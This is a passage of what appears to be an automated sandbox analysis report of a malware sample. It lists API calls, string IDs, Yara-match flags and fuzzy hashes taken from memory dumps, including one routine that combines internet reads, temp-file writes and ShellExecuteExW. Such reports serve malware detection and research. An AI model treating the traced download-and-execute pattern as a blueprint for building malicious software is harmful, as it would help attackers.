                                                                                                • ShellExecuteExW.SHELL32(?), ref: 02132DC5
                                                                                                • WaitForSingleObject.KERNEL32(?,00008000), ref: 02132DDA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                                • String ID: <
                                                                                                • API String ID: 838076374-4251816714
                                                                                                • Opcode ID: 9bf731035bfec187241e890923bec375076f7805f2a0f07ea48903a7d88d49b3
                                                                                                • Instruction ID: 78da2c5802ad8c4aa3a462227a3119b539ed898194d3fc23d6c085a433c5ea27
                                                                                                • Opcode Fuzzy Hash: 9bf731035bfec187241e890923bec375076f7805f2a0f07ea48903a7d88d49b3
                                                                                                • Instruction Fuzzy Hash: 9D41607194021DAFEB219F609C85FEAB7BDFF04745F0080E6A549E2150DF709E898FA4
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C03,000000FF,?,0214F218,00000004,02147D77,00000004,02148059), ref: 0214EEE9
                                                                                                • GetLastError.KERNEL32(?,0214F218,00000004,02147D77,00000004,02148059,?,02148789,?,00000008,02147FFD,00000000,?,?,00000000,?), ref: 0214EEF5
                                                                                                • LoadLibraryW.KERNEL32(advapi32.dll,?,0214F218,00000004,02147D77,00000004,02148059,?,02148789,?,00000008,02147FFD,00000000,?,?,00000000), ref: 0214EF05
                                                                                                • GetProcAddress.KERNEL32(00000000,00447430), ref: 0214EF1B
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0214EF31
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0214EF48
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0214EF5F
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0214EF76
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0214EF8D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                • String ID: advapi32.dll
                                                                                                • API String ID: 2340687224-4050573280
                                                                                                • Opcode ID: b1baead230867a3f00ca1e51c1d382e39c45d004bab6a6c18617c1e862122828
                                                                                                • Instruction ID: 85ab1e8ec0e3e792e47c947677cf4ca29577a667b6a6c049636934eaee406500
                                                                                                • Opcode Fuzzy Hash: b1baead230867a3f00ca1e51c1d382e39c45d004bab6a6c18617c1e862122828
                                                                                                • Instruction Fuzzy Hash: 13214CB5944750BFEB106FB49C08B5ABFA8EF05B16F104A2AF945D3651CB7CD4408BA8
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C03,000000FF,?,0214F218,00000004,02147D77,00000004,02148059), ref: 0214EEE9
                                                                                                • GetLastError.KERNEL32(?,0214F218,00000004,02147D77,00000004,02148059,?,02148789,?,00000008,02147FFD,00000000,?,?,00000000,?), ref: 0214EEF5
                                                                                                • LoadLibraryW.KERNEL32(advapi32.dll,?,0214F218,00000004,02147D77,00000004,02148059,?,02148789,?,00000008,02147FFD,00000000,?,?,00000000), ref: 0214EF05
                                                                                                • GetProcAddress.KERNEL32(00000000,00447430), ref: 0214EF1B
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0214EF31
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0214EF48
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0214EF5F
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0214EF76
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0214EF8D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                • String ID: advapi32.dll
                                                                                                • API String ID: 2340687224-4050573280
                                                                                                • Opcode ID: 99e788290a9b9b4e48efa8cfe9b0d171ae0e22239bfba1dadfb55c86f888b577
                                                                                                • Instruction ID: 15c688f605a3f78831b1ba405e2ab53cba8052b8efb3e4286bb3200a5980450f
                                                                                                • Opcode Fuzzy Hash: 99e788290a9b9b4e48efa8cfe9b0d171ae0e22239bfba1dadfb55c86f888b577
                                                                                                • Instruction Fuzzy Hash: B5215CB5944750BFEB106FA49C08B5ABFACEF05B16F108A3AF945D3651CB7CD4408BA8
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,021466FB), ref: 021424A6
                                                                                                • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 021424B4
                                                                                                • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 021424C2
                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,021466FB), ref: 021424F0
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 021424F7
                                                                                                • GetLastError.KERNEL32(?,?,?,021466FB), ref: 02142512
                                                                                                • GetLastError.KERNEL32(?,?,?,021466FB), ref: 0214251E
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02142534
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02142542
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                • String ID: kernel32.dll
                                                                                                • API String ID: 4179531150-1793498882
                                                                                                • Opcode ID: 86a114dfe65ccc4fa04666bdd8c1bca5b9a7b223918886f6160c3780a9292853
                                                                                                • Instruction ID: b8650c73230ea67b02babb4bc17fcf870837ce373b83c9a6bcbf36018a851118
                                                                                                • Opcode Fuzzy Hash: 86a114dfe65ccc4fa04666bdd8c1bca5b9a7b223918886f6160c3780a9292853
                                                                                                • Instruction Fuzzy Hash: FE11A5759403107FE7117B757C59AAB3BACAF01B127200536FC06D7151EF78D5808A6C
                                                                                                APIs
                                                                                                • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424856
                                                                                                  • Part of subcall function 00424B25: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424589), ref: 00424B35
                                                                                                • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042486B
                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042487A
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00424888
                                                                                                • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 004248FE
                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042493E
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0042494C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                • String ID: pContext$switchState
                                                                                                • API String ID: 3151764488-2660820399
                                                                                                • Opcode ID: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                                                                • Instruction ID: ac479dc220ac8c4341dea52746a205dfcc737ca8ea5a0b270bd9d9db7e88fe8b
                                                                                                • Opcode Fuzzy Hash: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                                                                • Instruction Fuzzy Hash: F7312835B002249BCF04EF65D881A6E73B5FF84314FA1456BE915A7382DB78EE05C798
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419758
                                                                                                • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419762
                                                                                                • DuplicateHandle.KERNEL32(00000000), ref: 00419769
                                                                                                • SafeRWList.LIBCONCRT ref: 00419788
                                                                                                  • Part of subcall function 00417757: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417768
                                                                                                  • Part of subcall function 00417757: List.LIBCMT ref: 00417772
                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041979A
                                                                                                • GetLastError.KERNEL32 ref: 004197A9
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197BF
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004197CD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                                                                • String ID: eventObject
                                                                                                • API String ID: 1999291547-1680012138
                                                                                                • Opcode ID: af56e6474bfbcfb1548dec2f01f626fb8f62d732f61f1ac0c92eedc387ce09ea
                                                                                                • Instruction ID: beae42e10eedb78f2922afb802a2acb8663f7a2576d102abe215b1da82e9749d
                                                                                                • Opcode Fuzzy Hash: af56e6474bfbcfb1548dec2f01f626fb8f62d732f61f1ac0c92eedc387ce09ea
                                                                                                • Instruction Fuzzy Hash: 4C11AC75500204EACB14EFA4CC4AFEE77B8AF00701F20413BF41AE21D1EB789E88866D
                                                                                                APIs
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02150C26
                                                                                                • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 02150C8D
                                                                                                • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 02150CAA
                                                                                                • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 02150D10
                                                                                                • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 02150D25
                                                                                                • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 02150D37
                                                                                                • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 02150D65
                                                                                                • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 02150D70
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02150D9C
                                                                                                • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 02150DAC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                                                                • String ID:
                                                                                                • API String ID: 3720063390-0
                                                                                                • Opcode ID: 5c88d6c2783884595e80d68d3e5870dbc5133051b1680621d86c5f4de34e2022
                                                                                                • Instruction ID: 70f58d464894a03ae84a969ac3d521b4889ecbd67ee585395165d72a60788947
                                                                                                • Opcode Fuzzy Hash: 5c88d6c2783884595e80d68d3e5870dbc5133051b1680621d86c5f4de34e2022
                                                                                                • Instruction Fuzzy Hash: 8D41A030A84228DECF15FBE4C4507AD77A6AF0A304F0440E9DD6A6B282DF769A05CF61
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 02162051
                                                                                                  • Part of subcall function 021636C1: HeapFree.KERNEL32(00000000,00000000,?,0216A34F,?,00000000,?,00000000,?,0216A5F3,?,00000007,?,?,0216A9E7,?), ref: 021636D7
                                                                                                  • Part of subcall function 021636C1: GetLastError.KERNEL32(?,?,0216A34F,?,00000000,?,00000000,?,0216A5F3,?,00000007,?,?,0216A9E7,?,?), ref: 021636E9
                                                                                                • _free.LIBCMT ref: 0216205D
                                                                                                • _free.LIBCMT ref: 02162068
                                                                                                • _free.LIBCMT ref: 02162073
                                                                                                • _free.LIBCMT ref: 0216207E
                                                                                                • _free.LIBCMT ref: 02162089
                                                                                                • _free.LIBCMT ref: 02162094
                                                                                                • _free.LIBCMT ref: 0216209F
                                                                                                • _free.LIBCMT ref: 021620AA
                                                                                                • _free.LIBCMT ref: 021620B8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                • Instruction ID: 93cf1283247b366fa47b0b89223c63693e1b1ba1abf4e1e246b6befff84ea21a
                                                                                                • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                • Instruction Fuzzy Hash: C9113F76950108AFCB01EF94C945DAD3FA6EF04750B5185A5BA188B271DB31EA609F90
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00431DEA
                                                                                                  • Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                                                  • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
                                                                                                • _free.LIBCMT ref: 00431DF6
                                                                                                • _free.LIBCMT ref: 00431E01
                                                                                                • _free.LIBCMT ref: 00431E0C
                                                                                                • _free.LIBCMT ref: 00431E17
                                                                                                • _free.LIBCMT ref: 00431E22
                                                                                                • _free.LIBCMT ref: 00431E2D
                                                                                                • _free.LIBCMT ref: 00431E38
                                                                                                • _free.LIBCMT ref: 00431E43
                                                                                                • _free.LIBCMT ref: 00431E51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                • Instruction ID: 87776794b7e7eece0f25d73b1b75ae69850b50dc626e3fc0762df5fa29964573
                                                                                                • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                • Instruction Fuzzy Hash: 9011A776500108BFDB02EF55C852CD93B65EF18356F0190AAF9184B232DA35DF519F88
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: __cftoe
                                                                                                • String ID: <(@$<(@
                                                                                                • API String ID: 4189289331-1745028333
                                                                                                • Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                                • Instruction ID: dd19a4b5401c40ac365bd4b6466f4abdac11a3aecfb9adebaa38ddcec4c103bf
                                                                                                • Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                                • Instruction Fuzzy Hash: 18512C32A00111EBDB149B5BEC41EAB77ADEF49325F90415FF81592282DB39D900866D
                                                                                                APIs
                                                                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044017F), ref: 0043EEB5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: DecodePointer
                                                                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                • API String ID: 3527080286-3064271455
                                                                                                • Opcode ID: d21bb7d67464a32b5cb6785f7c0f44f77b7a5dc18ca1c6f51477ac7f13519174
                                                                                                • Instruction ID: 29b0adf4cd4a19bf6d80e559d7e92663f8e6ec8767138eee3bf00a563bc4ae44
                                                                                                • Opcode Fuzzy Hash: d21bb7d67464a32b5cb6785f7c0f44f77b7a5dc18ca1c6f51477ac7f13519174
                                                                                                • Instruction Fuzzy Hash: 4851A07090150ADBCF14DFA9E9481AEBBB0FB0D300F2551A7D480A62A5C7B99D29CB1E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                                                • Instruction ID: 9bd53cd93f906e5d5e440ccb5479b2fb6f61983599966daa1f12354f10ebc6ce
                                                                                                • Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                                                • Instruction Fuzzy Hash: 29C10770E84349AFCB11DF98C8487BEBBB1AF09B14F0840D9E825A7392D7319551CF61
                                                                                                APIs
                                                                                                • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D00
                                                                                                • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D19
                                                                                                • FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D20
                                                                                                • PMDtoOffset.LIBCMT ref: 00428D3F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: FindInstanceTargetType$Offset
                                                                                                • String ID: Bad dynamic_cast!
                                                                                                • API String ID: 1467055271-2956939130
                                                                                                • Opcode ID: 6b652844560000745936e8dd829dcd732162928c29c706bfbf939b01ea652829
                                                                                                • Instruction ID: f58e39392761fe45c588d51cd7f0347041c183eb1b6093b38bd943e8a3a40f23
                                                                                                • Opcode Fuzzy Hash: 6b652844560000745936e8dd829dcd732162928c29c706bfbf939b01ea652829
                                                                                                • Instruction Fuzzy Hash: 16214972B022259FDB04DF65FD02AAE77A4EF54714B50411FF900932C1DF38E90586A9
                                                                                                APIs
                                                                                                • atomic_compare_exchange.LIBCONCRT ref: 0214C6CC
                                                                                                • atomic_compare_exchange.LIBCONCRT ref: 0214C6F0
                                                                                                • std::_Cnd_initX.LIBCPMT ref: 0214C701
                                                                                                • std::_Cnd_initX.LIBCPMT ref: 0214C70F
                                                                                                  • Part of subcall function 02131370: __Mtx_unlock.LIBCPMT ref: 02131377
                                                                                                • std::_Cnd_initX.LIBCPMT ref: 0214C71F
                                                                                                  • Part of subcall function 0214C3DF: __Cnd_broadcast.LIBCPMT ref: 0214C3E6
                                                                                                • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0214C72D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                                                                • String ID: d#D
                                                                                                • API String ID: 4258476935-2139572230
                                                                                                • Opcode ID: 5abf2091e9ef3c120a03ce8f27c2dce0f0e4d4679916a690eb1c806f1cbcb468
                                                                                                • Instruction ID: 59036690fbf57ac54c1936ae9e71c519569a7097769e34ae00701a17208cbd10
                                                                                                • Opcode Fuzzy Hash: 5abf2091e9ef3c120a03ce8f27c2dce0f0e4d4679916a690eb1c806f1cbcb468
                                                                                                • Instruction Fuzzy Hash: 3901A276D82605AFDB21BB608D84B9EB36BAF04350F144012E90997680EFB8EB158ED1
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D928,0042D928,?,?,?,00432375,00000001,00000001,23E85006), ref: 0043217E
                                                                                                • __alloca_probe_16.LIBCMT ref: 004321B6
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432375,00000001,00000001,23E85006,?,?,?), ref: 00432204
                                                                                                • __alloca_probe_16.LIBCMT ref: 0043229B
                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004322FE
                                                                                                • __freea.LIBCMT ref: 0043230B
                                                                                                  • Part of subcall function 00433697: RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9
                                                                                                • __freea.LIBCMT ref: 00432314
                                                                                                • __freea.LIBCMT ref: 00432339
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3864826663-0
                                                                                                • Opcode ID: fc5e23a9969f5a0b3c987a42f5ffda192cc55ac5853a9877383f7c3e4280cf28
                                                                                                • Instruction ID: ba832ad7ebe863b589d8a86c2aeb799e0d63014e0688505fe86a97fbdbb1aa79
                                                                                                • Opcode Fuzzy Hash: fc5e23a9969f5a0b3c987a42f5ffda192cc55ac5853a9877383f7c3e4280cf28
                                                                                                • Instruction Fuzzy Hash: DA51F572600216AFDB249F71DD41EAF77A9EB48754F14462AFD04E7240DBBCDC408668
                                                                                                APIs
                                                                                                  • Part of subcall function 02162131: GetLastError.KERNEL32(?,?,0215A9DC,?,00000000,?,0215CDD6,02132474,00000000,?,00451F20), ref: 02162135
                                                                                                  • Part of subcall function 02162131: _free.LIBCMT ref: 02162168
                                                                                                  • Part of subcall function 02162131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021621A9
                                                                                                • _free.LIBCMT ref: 02161434
                                                                                                • _free.LIBCMT ref: 0216144D
                                                                                                • _free.LIBCMT ref: 0216147F
                                                                                                • _free.LIBCMT ref: 02161488
                                                                                                • _free.LIBCMT ref: 02161494
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorLast
                                                                                                • String ID: C
                                                                                                • API String ID: 3291180501-1037565863
                                                                                                • Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                                • Instruction ID: 93690939fee7f9b534b673bb6ac5c55a88f71a047f628d7e4318e240a22d21b4
                                                                                                • Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                                • Instruction Fuzzy Hash: 98B11975A41219AFDB24DF28C888BADB7B5FB08714F1445EAD90EA7750D731AEA0CF40
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                                • Instruction ID: 55a04c4fd97285597fda9cd60a8f1bc8ebe0c89fd75a7d19e449d98a6b2a2e0f
                                                                                                • Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                                • Instruction Fuzzy Hash: FD61C171D80205AFDB20DF68C845BBEBBF5EF05720F2441AAE954FB251D7319961CB90
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                • Instruction ID: 375e79c53d3bcaca8bdb11d34ea16f93cbcffeb35ab56cd023e7f34feda17694
                                                                                                • Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                • Instruction Fuzzy Hash: 2361F271D00205AFEB20DF69C842B9ABBF4EF0D710F14516BE888EB382E7759D418B59
                                                                                                APIs
                                                                                                • GetConsoleCP.KERNEL32(?,0215C494,E0830C40,?,?,?,?,?,?,0216424F,0213E032,0215C494,?,0215C494,0215C494,0213E032), ref: 02163B1C
                                                                                                • __fassign.LIBCMT ref: 02163B97
                                                                                                • __fassign.LIBCMT ref: 02163BB2
                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,0215C494,00000001,?,00000005,00000000,00000000), ref: 02163BD8
                                                                                                • WriteFile.KERNEL32(?,?,00000000,0216424F,00000000,?,?,?,?,?,?,?,?,?,0216424F,0213E032), ref: 02163BF7
                                                                                                • WriteFile.KERNEL32(?,0213E032,00000001,0216424F,00000000,?,?,?,?,?,?,?,?,?,0216424F,0213E032), ref: 02163C30
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 1324828854-0
                                                                                                • Opcode ID: e6aa7f8e09cc3bdd419a993f0e627323657b2fb42e9cf7c9360fe368da63a324
                                                                                                • Instruction ID: 871c72d67e7b9cfdcd76e26f763efcad760dafc596667d1b8fdb21fe8fa10d05
